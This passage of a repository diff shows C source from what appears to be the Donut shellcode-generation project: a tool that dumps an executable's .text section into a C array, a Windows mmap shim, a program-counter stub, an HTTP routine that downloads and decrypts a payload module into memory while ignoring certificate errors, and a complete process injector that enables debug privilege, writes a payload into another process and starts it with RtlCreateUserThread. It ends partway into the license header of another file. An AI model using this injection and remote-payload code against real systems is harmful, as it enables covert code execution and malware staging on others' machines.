23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include <stdio.h>
32 #include <string.h>
33 #include <stdlib.h>
34 #include <stdint.h>
35 #include <ctype.h>
36
37 #include <fcntl.h>
38 #include <errno.h>
39 #include <sys/types.h>
40 #include <sys/stat.h>
41
42 #if defined(_WIN32) || defined(_WIN64)
43 #define WINDOWS
44 #include <windows.h>
45 #include <shlwapi.h>
46 #include "mmap.h"
47 #pragma comment(lib, "shlwapi.lib")
48 #else
49 #define NIX
50 #include <libgen.h>
51 #include <sys/mman.h>
52 #include <unistd.h>
53 #include <pe.h>
54 #endif
55
56 // return pointer to DOS header
57 PIMAGE_DOS_HEADER DosHdr(void *map) {
58 return (PIMAGE_DOS_HEADER)map;
59 }
60
61 // return pointer to NT header
62 PIMAGE_NT_HEADERS NtHdr (void *map) {
63 return (PIMAGE_NT_HEADERS) ((uint8_t*)map + DosHdr(map)->e_lfanew);
64 }
65
66 // return pointer to File header
67 PIMAGE_FILE_HEADER FileHdr (void *map) {
68 return &NtHdr(map)->FileHeader;
69 }
70
71 // determines CPU architecture of binary
72 int is32 (void *map) {
73 return FileHdr(map)->Machine == IMAGE_FILE_MACHINE_I386;
74 }
75
76 // determines CPU architecture of binary
77 int is64 (void *map) {
78 return FileHdr(map)->Machine == IMAGE_FILE_MACHINE_AMD64;
79 }
80
81 // return pointer to Optional header
82 void* OptHdr (void *map) {
83 return (void*)&NtHdr(map)->OptionalHeader;
84 }
85
86 // return pointer to first section header
87 PIMAGE_SECTION_HEADER SecHdr (void *map) {
88 PIMAGE_NT_HEADERS nt = NtHdr(map);
89
90 return (PIMAGE_SECTION_HEADER)((uint8_t*)&nt->OptionalHeader +
91 nt->FileHeader.SizeOfOptionalHeader);
92 }
93
94 uint32_t DirSize (void *map) {
95 if (is32(map)) {
96 return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->NumberOfRvaAndSizes;
97 } else {
98 return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->NumberOfRvaAndSizes;
99 }
100 }
101
102 uint32_t SecSize (void *map) {
103 return NtHdr(map)->FileHeader.NumberOfSections;
104 }
105
106 PIMAGE_DATA_DIRECTORY Dirs (void *map) {
107 if (is32(map)) {
108 return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->DataDirectory;
109 } else {
110 return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->DataDirectory;
111 }
112 }
113
114 uint64_t ImgBase (void *map) {
115 if (is32(map)) {
116 return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->ImageBase;
117 } else {
118 return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->ImageBase;
119 }
120 }
121
122 // valid dos header?
123 int valid_dos_hdr (void *map) {
124 PIMAGE_DOS_HEADER dos = DosHdr(map);
125
126 if (dos->e_magic != IMAGE_DOS_SIGNATURE) return 0;
127 return (dos->e_lfanew != 0);
128 }
129
130 // valid nt headers
131 int valid_nt_hdr (void *map) {
132 return NtHdr(map)->Signature == IMAGE_NT_SIGNATURE;
133 }
134
135 uint32_t rva2ofs (void *map, uint32_t rva) {
136 int i;
137
138 PIMAGE_SECTION_HEADER sh = SecHdr(map);
139
140 for (i=0; i<SecSize(map); i++) {
141 if (rva >= sh[i].VirtualAddress && rva < sh[i].VirtualAddress + sh[i].SizeOfRawData)
142 return sh[i].PointerToRawData + (rva - sh[i].VirtualAddress);
143 }
144 return -1;
145 }
146
147 void bin2h(void *map, char *fname, void *bin, uint32_t len) {
148 char label[32], file[32], *str;
149 uint32_t i;
150 uint8_t *p=(uint8_t*)bin;
151 FILE *fd;
152
153 memset(label, 0, sizeof(label));
154 memset(file, 0, sizeof(file));
155
156 #if defined(WINDOWS)
157 str = PathFindFileName(fname);
158 #else
159 str = basename(fname);
160 #endif
161 for(i=0; str[i] != 0 && i < 16;i++) {
162 if(str[i] == '.') {
163 file[i] = label[i] = '_';
164 } else {
165 label[i] = toupper(str[i]);
166 file[i] = tolower(str[i]);
167 }
168 }
169 if(map != NULL) {
170 strcat(label, is32(map) ? "_X86" : "_X64");
171 strcat(file, is32(map) ? "_x86" : "_x64");
172 }
173 strcat(file, ".h");
174
175 fd = fopen(file, "wb");
176
177 if(fd != NULL) {
178 fprintf(fd, "\nunsigned char %s[] = {", label);
179
180 for(i=0;i<len;i++) {
181 if(!(i % 12)) fprintf(fd, "\n ");
182 fprintf(fd, "0x%02x", p[i]);
183 if((i+1) != len) fprintf(fd, ", ");
184 }
185 fprintf(fd, "};\n\n");
186 fclose(fd);
187 printf(" [ saved code to %s\n", file);
188 } else printf(" [ unable to create file : %s\n", file);
189 }
190
191 /**
192 void bin2array(void *map, char *fname, void *bin, uint32_t len) {
193 char label[32], file[32], *str;
194 uint32_t i;
195 uint32_t *p=(uint32_t*)bin;
196 FILE *fd;
197
198 memset(label, 0, sizeof(label));
199 memset(file, 0, sizeof(file));
200
201 #if defined(WINDOWS)
202 str = PathFindFileName(fname);
203 #else
204 str = basename(fname);
205 #endif
206 for(i=0; str[i] != 0 && i < 16;i++) {
207 if(str[i] == '.') {
208 file[i] = label[i] = '_';
209 } else {
210 label[i] = toupper(str[i]);
211 file[i] = tolower(str[i]);
212 }
213 }
214
215 strcat(file, ".h");
216
217 fd = fopen(file, "wb");
218
219 if(fd != NULL) {
220 // align up by 4
221 len = (len & -4) + 4;
222 len >>= 2;
223
224 // declare the array
225 fprintf(fd, "\nunsigned int %s[%i];\n\n", label, len);
226
227 // initialize array
228 for(i=0; i<len; i++) {
229 fprintf(fd, "%s[%i] = 0x%08" PRIX32 ";\n", label, i, p[i]);
230 }
231 fclose(fd);
232 printf(" [ Saved array to %s\n", file);
233 } else printf(" [ unable to create file : %s\n", file);
234 }
235 */
236 // structure of COFF (.obj) file
237
238 //--------------------------//
239 // IMAGE_FILE_HEADER //
240 //--------------------------//
241 // IMAGE_SECTION_HEADER //
242 // * num sections //
243 //--------------------------//
244 // //
245 // //
246 // //
247 // section data //
248 // * num sections //
249 // //
250 // //
251 //--------------------------//
252 // IMAGE_SYMBOL //
253 // * num symbols //
254 //--------------------------//
255 // string table //
256 //--------------------------//
257
258 int main (int argc, char *argv[]) {
259 int fd, i;
260 struct stat fs;
261 uint8_t *map, *cs;
262 PIMAGE_SECTION_HEADER sh;
263 //PIMAGE_FILE_HEADER fh;
264 //PIMAGE_COFF_SYMBOLS_HEADER csh;
265 uint32_t ofs, len;
266
267 if (argc != 2) {
268 printf ("\n [ usage: file2h <file.exe | file.bin>\n");
269 return 0;
270 }
271
272 // open file for reading
273 fd = open(argv[1], O_RDONLY);
274
275 if(fd == 0) {
276 printf(" [ unable to open %s\n", argv[1]);
277 return 0;
278 }
279 // if file has some data
280 if(fstat(fd, &fs) == 0) {
281 // map into memory
282 map = (uint8_t*)mmap(NULL, fs.st_size,
283 PROT_READ, MAP_PRIVATE, fd, 0);
284 if(map != NULL) {
285 if(valid_dos_hdr(map) && valid_nt_hdr(map)) {
286 printf(" [ Found valid DOS and NT header.\n");
287 // get the .text section
288 sh = SecHdr(map);
289 // if a section header was returned
290 if(sh != NULL) {
291 printf(" [ Locating .text section.\n");
292 // locate the .text section
293 for(i=0; i<SecSize(map); i++) {
294 if(strcmp((char*)sh[i].Name, ".text") == 0) {
295 ofs = rva2ofs(map, sh[i].VirtualAddress);
296
297 if(ofs != -1) {
298 cs = (map + ofs);
299 len = sh[i].Misc.VirtualSize;
300 // convert to header file
301 bin2h(map, argv[1], cs, len);
302 break;
303 }
304 }
305 }
306 }
307 } else {
308 printf(" [ No valid DOS or NT header found.\n");
309 // treat file as binary
310 bin2h(NULL, argv[1], map, fs.st_size);
311 //bin2array(NULL, argv[1], map, fs.st_size);
312 }
313 munmap(map, fs.st_size);
314 }
315 }
316 close(fd);
317 return 0;
318 }
payload/exe2h/exe2h.obj less more
Binary diff not shown
+0
-74
payload/exe2h/mmap-windows.c less more
0 /* mmap() replacement for Windows
1 *
2 * Author: Mike Frysinger <[email protected]>
3 * Placed into the public domain
4 */
5
6 /* References:
7 * CreateFileMapping: http://msdn.microsoft.com/en-us/library/aa366537(VS.85).aspx
8 * CloseHandle: http://msdn.microsoft.com/en-us/library/ms724211(VS.85).aspx
9 * MapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366761(VS.85).aspx
10 * UnmapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366882(VS.85).aspx
11 */
12
13 #include "mmap.h"
14
15 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset)
16 {
17 if (prot & ~(PROT_READ | PROT_WRITE | PROT_EXEC))
18 return MAP_FAILED;
19 if (fd == -1) {
20 if (!(flags & MAP_ANON) || offset)
21 return MAP_FAILED;
22 } else if (flags & MAP_ANON)
23 return MAP_FAILED;
24
25 DWORD flProtect;
26 if (prot & PROT_WRITE) {
27 if (prot & PROT_EXEC)
28 flProtect = PAGE_EXECUTE_READWRITE;
29 else
30 flProtect = PAGE_READWRITE;
31 } else if (prot & PROT_EXEC) {
32 if (prot & PROT_READ)
33 flProtect = PAGE_EXECUTE_READ;
34 else if (prot & PROT_EXEC)
35 flProtect = PAGE_EXECUTE;
36 } else
37 flProtect = PAGE_READONLY;
38
39 off_t end = length + offset;
40 HANDLE mmap_fd, h;
41 if (fd == -1)
42 mmap_fd = INVALID_HANDLE_VALUE;
43 else
44 mmap_fd = (HANDLE)_get_osfhandle(fd);
45 h = CreateFileMapping(mmap_fd, NULL, flProtect, DWORD_HI(end), DWORD_LO(end), NULL);
46 if (h == NULL)
47 return MAP_FAILED;
48
49 DWORD dwDesiredAccess;
50 if (prot & PROT_WRITE)
51 dwDesiredAccess = FILE_MAP_WRITE;
52 else
53 dwDesiredAccess = FILE_MAP_READ;
54 if (prot & PROT_EXEC)
55 dwDesiredAccess |= FILE_MAP_EXECUTE;
56 if (flags & MAP_PRIVATE)
57 dwDesiredAccess |= FILE_MAP_COPY;
58 void *ret = MapViewOfFile(h, dwDesiredAccess, DWORD_HI(offset), DWORD_LO(offset), length);
59 if (ret == NULL) {
60 CloseHandle(h);
61 ret = MAP_FAILED;
62 }
63 return ret;
64 }
65
66 void munmap(void *addr, size_t length)
67 {
68 UnmapViewOfFile(addr);
69 /* ruh-ro, we leaked handle from CreateFileMapping() ... */
70 }
71
72 #undef DWORD_HI
73 #undef DWORD_LO
payload/exe2h/mmap-windows.obj less more
Binary diff not shown
+0
-45
payload/exe2h/mmap.h less more
0
1
2 #ifndef MMAP_H
3 #define MMAP_H
4
5 #include <io.h>
6 #include <windows.h>
7 #include <sys/types.h>
8
9 #define PROT_READ 0x1
10 #define PROT_WRITE 0x2
11 /* This flag is only available in WinXP+ */
12 #ifdef FILE_MAP_EXECUTE
13 #define PROT_EXEC 0x4
14 #else
15 #define PROT_EXEC 0x0
16 #define FILE_MAP_EXECUTE 0
17 #endif
18
19 #define MAP_SHARED 0x01
20 #define MAP_PRIVATE 0x02
21 #define MAP_ANONYMOUS 0x20
22 #define MAP_ANON MAP_ANONYMOUS
23 #define MAP_FAILED ((void *) -1)
24
25 #ifdef __USE_FILE_OFFSET64
26 # define DWORD_HI(x) (x >> 32)
27 # define DWORD_LO(x) ((x) & 0xffffffff)
28 #else
29 # define DWORD_HI(x) (0)
30 # define DWORD_LO(x) (x)
31 #endif
32
33 #ifdef __cplusplus
34 extern "C" {
35 #endif
36
37 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset);
38 void munmap(void *addr, size_t length);
39
40 #ifdef __cplusplus
41 }
42 #endif
43
44 #endif
+0
-61
payload/getpc.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 // Function to return the program counter.
32 // Always place this at the end of payload.
33 // Tested with x86 build of MSVC 2019 and MinGW. YMMV.
34 #if defined(_MSC_VER)
35 #if defined(_M_IX86)
36 __declspec(naked) char *get_pc(void) {
37 __asm {
38 call pc_addr
39 pc_addr:
40 pop eax
41 sub eax, 5
42 ret
43 }
44 }
45 #endif
46 #elif defined(__GNUC__)
47 #if defined(__i386__)
48 asm (
49 ".global get_pc\n"
50 ".global _get_pc\n"
51 "_get_pc:\n"
52 "get_pc:\n"
53 " call pc_addr\n"
54 "pc_addr:\n"
55 " pop %eax\n"
56 " sub $5, %eax\n"
57 " ret\n"
58 );
59 #endif
60 #endif
+0
-198
payload/http_client.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 BOOL DownloadModule(PDONUT_INSTANCE inst) {
32 HINTERNET hin, con, req;
33 PBYTE buf;
34 DWORD s, n, rd, len, code=0;
35 BOOL bResult = FALSE, bSecure = FALSE;
36 URL_COMPONENTS uc;
37 CHAR host[DONUT_MAX_URL],
38 file[DONUT_MAX_URL];
39
40 // default flags for HTTP client
41 DWORD flags = INTERNET_FLAG_KEEP_CONNECTION |
42 INTERNET_FLAG_NO_CACHE_WRITE |
43 INTERNET_FLAG_NO_UI |
44 INTERNET_FLAG_RELOAD |
45 INTERNET_FLAG_NO_AUTO_REDIRECT;
46
47 Memset(&uc, 0, sizeof(uc));
48
49 uc.dwStructSize = sizeof(uc);
50 uc.lpszHostName = host;
51 uc.lpszUrlPath = file;
52 uc.dwHostNameLength = DONUT_MAX_URL;
53 uc.dwUrlPathLength = DONUT_MAX_URL;
54
55 DPRINT("Decoding URL %s", inst->http.url);
56
57 if(!inst->api.InternetCrackUrl(
58 inst->http.url, 0, ICU_DECODE, &uc)) {
59 return FALSE;
60 }
61
62 bSecure = (uc.nScheme == INTERNET_SCHEME_HTTPS);
63
64 // if secure connection, update the flags to ignore
65 // invalid certificates
66 if(bSecure) {
67 flags |= INTERNET_FLAG_IGNORE_CERT_CN_INVALID |
68 INTERNET_FLAG_IGNORE_CERT_DATE_INVALID |
69 INTERNET_FLAG_SECURE;
70 }
71
72 DPRINT("Initializing WININET");
73
74 hin = inst->api.InternetOpen(
75 NULL, INTERNET_OPEN_TYPE_PRECONFIG,
76 NULL, NULL, 0);
77
78 if(hin == NULL) return FALSE;
79
80 DPRINT("Creating %s connection for %s",
81 bSecure ? "HTTPS" : "HTTP", host);
82
83 con = inst->api.InternetConnect(
84 hin, host,
85 bSecure ? INTERNET_DEFAULT_HTTPS_PORT : INTERNET_DEFAULT_HTTP_PORT,
86 NULL, NULL,
87 INTERNET_SERVICE_HTTP, 0, 0);
88
89 if(con != NULL) {
90 DPRINT("Creating HTTP %s request for %s",
91 inst->http.req, file);
92
93 req = inst->api.HttpOpenRequest(
94 con, inst->http.req,
95 file, NULL, NULL, NULL, flags, 0);
96
97 if(req != NULL) {
98
99 // see if we should ignore invalid certificates for this request
100 if(bSecure) {
101 if(flags & INTERNET_FLAG_IGNORE_CERT_CN_INVALID) {
102 n = sizeof (s);
103
104 s = SECURITY_FLAG_IGNORE_UNKNOWN_CA |
105 SECURITY_FLAG_IGNORE_CERT_DATE_INVALID |
106 SECURITY_FLAG_IGNORE_CERT_CN_INVALID |
107 SECURITY_FLAG_IGNORE_WRONG_USAGE |
108 SECURITY_FLAG_IGNORE_REVOCATION;
109
110 DPRINT("Setting option to ignore invalid certificates");
111
112 inst->api.InternetSetOption(
113 req,
114 INTERNET_OPTION_SECURITY_FLAGS,
115 &s,
116 sizeof(s));
117 }
118 }
119 DPRINT("Sending request");
120
121 if(inst->api.HttpSendRequest(req, NULL, 0, NULL, 0)) {
122 len = sizeof(DWORD);
123 code = 0;
124 DPRINT("Querying status code");
125
126 if(inst->api.HttpQueryInfo(
127 req,
128 HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER,
129 &code, &len, 0))
130 {
131 DPRINT("Code is %ld", code);
132
133 if(code == HTTP_STATUS_OK) {
134 DPRINT("Querying content length");
135
136 len = sizeof(SIZE_T);
137 inst->mod_len = 0;
138
139 if(inst->api.HttpQueryInfo(
140 req,
141 HTTP_QUERY_CONTENT_LENGTH | HTTP_QUERY_FLAG_NUMBER,
142 &inst->mod_len, &len, 0))
143 {
144 if(inst->mod_len != 0) {
145 DPRINT("Allocating memory for module");
146
147 inst->module.p = inst->api.VirtualAlloc(
148 NULL, inst->mod_len,
149 MEM_COMMIT | MEM_RESERVE,
150 PAGE_READWRITE);
151
152 if(inst->module.p != NULL) {
153 rd = 0;
154 DPRINT("Downloading module into memory");
155 bResult = inst->api.InternetReadFile(
156 req,
157 inst->module.p,
158 inst->mod_len, &rd);
159 }
160 }
161 }
162 }
163 }
164 }
165 DPRINT("Closing request handle");
166 inst->api.InternetCloseHandle(req);
167 }
168 DPRINT("Closing HTTP connection");
169 inst->api.InternetCloseHandle(con);
170 }
171 DPRINT("Closing internet handle");
172 inst->api.InternetCloseHandle(hin);
173
174 #if !defined(NOCRYPTO)
175 if(bResult) {
176 PDONUT_MODULE mod = inst->module.p;
177
178 DPRINT("Decrypting %lli bytes of module", inst->mod_len);
179
180 donut_decrypt(inst->mod_key.mk,
181 inst->mod_key.ctr,
182 mod,
183 inst->mod_len);
184
185 DPRINT("Generating hash to verify decryption");
186 ULONG64 mac = maru(inst->sig, inst->iv);
187
188 DPRINT("Module : %016llx | Result : %016llx", mod->mac, mac);
189
190 if(mac != mod->mac) {
191 DPRINT("Decryption failed");
192 return FALSE;
193 }
194 }
195 #endif
196 return bResult;
197 }
+0
-235
payload/inject.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include <Windows.h>
32 #include <stdio.h>
33 #include <tlhelp32.h>
34
35 #pragma comment(lib, "advapi32.lib")
36 #pragma comment(lib, "shell32.lib")
37 #pragma comment(lib, "user32.lib")
38
39 typedef struct _CLIENT_ID {
40 PVOID UniqueProcess;
41 PVOID UniqueThread;
42 } CLIENT_ID, *PCLIENT_ID;
43
44 typedef NTSTATUS (NTAPI *RtlCreateUserThread_t) (
45 IN HANDLE ProcessHandle,
46 IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL,
47 IN BOOLEAN CreateSuspended,
48 IN ULONG StackZeroBits,
49 IN OUT PULONG StackReserved,
50 IN OUT PULONG StackCommit,
51 IN PVOID StartAddress,
52 IN PVOID StartParameter OPTIONAL,
53 OUT PHANDLE ThreadHandle,
54 OUT PCLIENT_ID ClientID);
55
56 BOOL EnablePrivilege(PCHAR szPrivilege){
57 HANDLE hToken;
58 BOOL bResult;
59 LUID luid;
60 TOKEN_PRIVILEGES tp;
61
62 // open token for current process
63 bResult = OpenProcessToken(GetCurrentProcess(),
64 TOKEN_ADJUST_PRIVILEGES, &hToken);
65
66 if(!bResult) return FALSE;
67
68 // lookup privilege
69 bResult = LookupPrivilegeValue(NULL, szPrivilege, &luid);
70 if(bResult){
71 tp.PrivilegeCount = 1;
72 tp.Privileges[0].Luid = luid;
73 tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
74
75 // adjust token
76 bResult = AdjustTokenPrivileges(hToken, FALSE, &tp, 0, NULL, NULL);
77 }
78 CloseHandle(hToken);
79 return bResult;
80 }
81
82 // display error message for last error code
83 VOID xstrerror (PCHAR fmt, ...){
84 PCHAR error=NULL;
85 va_list arglist;
86 CHAR buffer[1024];
87 DWORD dwError=GetLastError();
88
89 va_start(arglist, fmt);
90 vsnprintf(buffer, ARRAYSIZE(buffer), fmt, arglist);
91 va_end (arglist);
92
93 if (FormatMessage (
94 FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
95 NULL, dwError, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
96 (LPSTR)&error, 0, NULL))
97 {
98 printf(" [ %s : %s\n", buffer, error);
99 LocalFree (error);
100 } else {
101 printf(" [ %s error : %08lX\n", buffer, dwError);
102 }
103 }
104
105 DWORD name2pid(PCHAR procName){
106 HANDLE hSnap;
107 PROCESSENTRY32 pe32;
108 DWORD pid=0;
109
110 // create snapshot of system
111 hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
112 if(hSnap == INVALID_HANDLE_VALUE) return 0;
113
114 pe32.dwSize = sizeof(PROCESSENTRY32);
115
116 // get first process
117 if(Process32First(hSnap, &pe32)){
118 do {
119 if(!lstrcmpi(pe32.szExeFile, procName)){
120 pid=pe32.th32ProcessID;
121 break;
122 }
123 } while(Process32Next(hSnap, &pe32));
124 }
125 CloseHandle(hSnap);
126 return pid;
127 }
128
129 BOOL injectPIC(DWORD id, LPVOID code, DWORD codeLen) {
130 SIZE_T wr;
131 HANDLE hp,ht;
132 LPVOID cs;
133 RtlCreateUserThread_t pRtlCreateUserThread;
134 HMODULE hn;
135 CLIENT_ID cid;
136 NTSTATUS nt=~0UL;
137 DWORD t;
138
139 // 1. resolve API address
140 hn = GetModuleHandle("ntdll.dll");
141 pRtlCreateUserThread=(RtlCreateUserThread_t)
142 GetProcAddress(hn, "RtlCreateUserThread");
143
144 printf(" [ opening process %li\n", id);
145 // 2. open the target process
146 hp=OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);
147
148 if(hp == NULL) return FALSE;
149
150 // 3. allocate executable-read-write (XRW) memory for payload
151 printf(" [ allocating memory for payload.\n");
152 cs=VirtualAllocEx(hp, NULL, codeLen,
153 MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
154
155 printf(" [ writing code to %p.\n", cs);
156 // 4. copy the payload to remote memory
157 WriteProcessMemory(hp, cs, code, codeLen, &wr);
158 VirtualProtectEx(hp, cs, codeLen, PAGE_EXECUTE_READ, &t);
159
160 printf(" [ press any key to continue.\n");
161 getchar();
162
163 // 5. execute payload in remote process
164 printf(" [ creating new thread.\n");
165 nt = pRtlCreateUserThread(hp, NULL, FALSE, 0, NULL,
166 NULL, cs, NULL, &ht, &cid);
167
168 printf(" [ nt status is %lx\n", nt);
169 WaitForSingleObject(ht, INFINITE);
170
171 // 6. close remote thread handle
172 CloseHandle(ht);
173
174 // 7. free remote memory
175 printf(" [ freeing memory.\n");
176 VirtualFreeEx(hp, cs, codeLen, MEM_RELEASE | MEM_DECOMMIT);
177
178 // 8. close remote process handle
179 CloseHandle(hp);
180 return nt == 0; // STATUS_SUCCESS
181 }
182
183 DWORD getdata(PCHAR path, LPVOID *data){
184 HANDLE hf;
185 DWORD len,rd=0;
186
187 // 1. open the file
188 hf=CreateFile(path, GENERIC_READ, 0, 0,
189 OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
190
191 if(hf!=INVALID_HANDLE_VALUE){
192 // get file size
193 len=GetFileSize(hf, 0);
194 // allocate memory
195 *data=malloc(len + 16);
196 // read file contents into memory
197 ReadFile(hf, *data, len, &rd, 0);
198 CloseHandle(hf);
199 }
200 return rd;
201 }
202
203 int main(int argc, char *argv[]){
204 LPVOID code;
205 SIZE_T code_len;
206 DWORD pid;
207
208 if (argc != 3){
209 printf("\n [ usage: inject <process id | process name> <payload.bin>\n");
210 return 0;
211 }
212
213 if(!EnablePrivilege(SE_DEBUG_NAME)) {
214 printf(" [ cannot enable SeDebugPrivilege.\n");
215 }
216
217 // get pid
218 pid=atoi(argv[1]);
219 if(pid==0) pid=name2pid(argv[1]);
220
221 if(pid==0) {
222 printf(" [ unable to obtain process id.\n");
223 return 0;
224 }
225 // pic
226 code_len = getdata(argv[2], &code);
227 if(code_len == 0) {
228 printf(" [ unable to read payload.\n");
229 return 0;
230 }
231 injectPIC(pid, code, code_len);
232 free(code);
233 return 0;
234 }
+0
-364
payload/inmem_dotnet.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
